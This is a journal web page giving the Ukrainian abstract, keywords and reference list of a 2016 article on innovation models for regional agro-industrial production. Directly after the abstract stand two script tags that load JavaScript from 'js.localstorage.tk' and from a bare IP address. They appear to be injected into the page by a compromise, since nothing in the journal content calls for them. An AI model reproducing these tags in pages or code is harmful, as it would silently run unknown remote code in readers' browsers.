ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 38.432:330.341.1
Сторінка молодого науковця

Проблемні аспекти формування інноваційної моделі агропромислового виробництва регіону / Рибачук В.П. // Економіка АПК. - 2016. - № 9 - С. 109

Здійснено теоретичні узагальнення проблематики інноваційного розвитку економіки, визначено сутність, місце і роль інновацій у функціонуванні агропромислового виробництва. Сформульовано авторське бачення змісту поняття «інноваційна модель» та визначено фактори її взаємозв’язку з ефективністю й продуктивністю. Розкрито роль науки у формуванні інноваційної моделі виробництва регіону, виходячи з проблем, які нині існують у галузі сільського господарства та економіці. Регіони, які будують свою економіку переважно на розвитку агрогосподарського комплексу, потребують ефективної дифузії (поширення) інновацій. Від того, наскільки система інноваційного забезпечення відповідає реальним вимогам практики господарювання, залежить результат. Один із найприйнятніших шляхів у побудові інноваційної моделі розвитку агропромислового виробництва України і досліджуваного регіону є впорядкування ефективності процесу дифузії інновацій, особливо в умовах дефіциту часу й фінансових ресурсів, що разом зі значним невикористаним продуктивним потенціалом землі забезпечить творення додаткового продукту, нову якість усієї галузі. Табл.: 2. Бібліогр.: 20.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: інновації, інноваційна модель, агропромислове виробництво, регіон, ефективність, продуктивність

Список використаних джерел

 1. Шумпетер Йозеф А. Теорія економічного розвитку: дослідження прибутків, капіталу, відсотка та економічного циклу ; пер. з англ. В. Старка / Й.А Шумпетер. - К.: Видавничий дім «Києво-Могилянська академія», 2011. - 242 с.
 2. Кондратьев Н.Д. Большие циклы конъюнктуры и теория предвидения. Избранные труды / Н.Д. Кондратьев; Международный фонд Н.Д. Кондратьева и др.; Ред. колл.: Л.И. Абалкин (пред.) и др.; сост. Ю.В. Яковец. - М.: ЗАО «Изд-во «Экономика», 2002. - 768 с.
 3. Санто Б. Инновации как средство экономического развития : пер. с венг. / Б. Санто. - М.: Прогресс, 1990. - 296 с.
 4. Туган-Барановский М.И. Промышленные кризисы. Очерк из социальной истории Англии / М.И. Туган-Барановский. - К.: Наук. думка, 2004. - 368 с.
 5. Геєць В.М. Інноваційні перспективи України / В.М. Геєць, В.П. Семиноженко - Х.: Константа, 2006. - 272 с.
 6. Федулова Л. І. Інноваційна економіка / Л. І. Федулова. - К.: Либідь, 2006. - 480 с.
 7. Харгадон Е. Управління інноваціями. Досвід провідних компаній ; пер. з англ. А. Н. Свирид / Е. Харгадон. - М. : Вільямс, 2007. - 304 с.
 8. Шебанін В С. Наукове забезпечення інноваційного розвитку АПК як пріоритетний напрям діяльності аграрного університету / В.С. Шебанін // Економіка АПК. - 2014. - № 7. - С. 19-25.
 9. Шебанін В.С. Освіта та наука як рушійні фактори інноваційного розвитку аграрної сфери України / В.С. Шебанін // Економіка АПК. - 2010. - № 3. - С. 94-98.
 10. Володін C.А. Теоретико-методологічні та організаційні засади інноваційного провайдингу на наукоємному аграрному ринку: [моногр.] / С. А. Володін. - К.: ЗАТ «Нічлава», 2007. - 384 с.
 11. Шпикуляк О.Г. Розвиток інноваційної діяльності в аграрній сфері: менеджмент та ефективність: моногр. / О.Г. Шпикуляк, М.І. Грицаєнко. - Херсон: ОЛДІ-ПЛЮС, 2016. - 424 с.
 12. Шпикуляк О.Г. Роль науки в системі інституціоналізації ефектів науково-технічного прогресу / Шляхи активізації інноваційної діяльності в освіті, науці, економіці: зб. матер. Всеукр. наук. - практ. конф., м. Вінниця, 12 квіт. 2016 р.: у 2-х т. - Т. 1 / редкол.: ВННІЕ ТНЕУ. - Тернопіль: Крок, 2016. - 212 с. - С. 46-47.
 13. Лупенко Ю.О. Інноваційне забезпечення розвитку сільського господарства України : проблеми та перспективи : моногр. / [Лупенко Ю.О., Малік М.Й., Шпикуляк О.Г. та інші]. - К. : ННЦ «ІАЕ», 2014. - 516 с.
 14. Крисальний О.В. Організаційно-економічні особливості інноваційної діяльності / О. В. Крисальний // Економіка АПК. - 2005. - № 8. - С.10-13.
 15. Mensh G. Stalemate in technology: Innovation Overcome the Depression. - Cambridge: Mass, 1979. - 241 p.
 16. Nelson R. National systems of innovations: A comparative analysis / R. Nelson. - Oxford: University press, 1993. - 544 р.
 17. Freeman C. The Economics of Industrial innovation / Freeman C. - London, 1982. - 456 p.
 18. Эндрю Дж.П. Возврат на инновации. Практическое руководство по управлению инновациями в бизнесе / Дж.П. Эндрю. - М.: Изд-во "Гревцов Паблишер", 2008. - 324 с.
 19. Кетова Н.П. Стратегия капитализации инновационных ресурсов периферийных регионов России с учетом их ограниченности / Н.П. Кетова, В.Н. Овчинников // TERRA ECONOMICUS. 2014. Т. 12. № 1. - С. 92-105. - Електронний ресурс. - Режим доступу : http://ecsocman.hse.ru/data/2014/06/29/1251094099/journal12.1-9.pdf.
 20. Родионов И.И. Мы неизбежно переключимся на инновационную модель / И.И. Родионов // Бюл. Инновационные Тренды. - 2011. - № 12. - С. 11-12. - Електронний ресурс. - Режим доступу : http://ecsocman.hse.ru/data/2011/11/08/1270174305/15.pdf.
Читати статтю: 14.pdf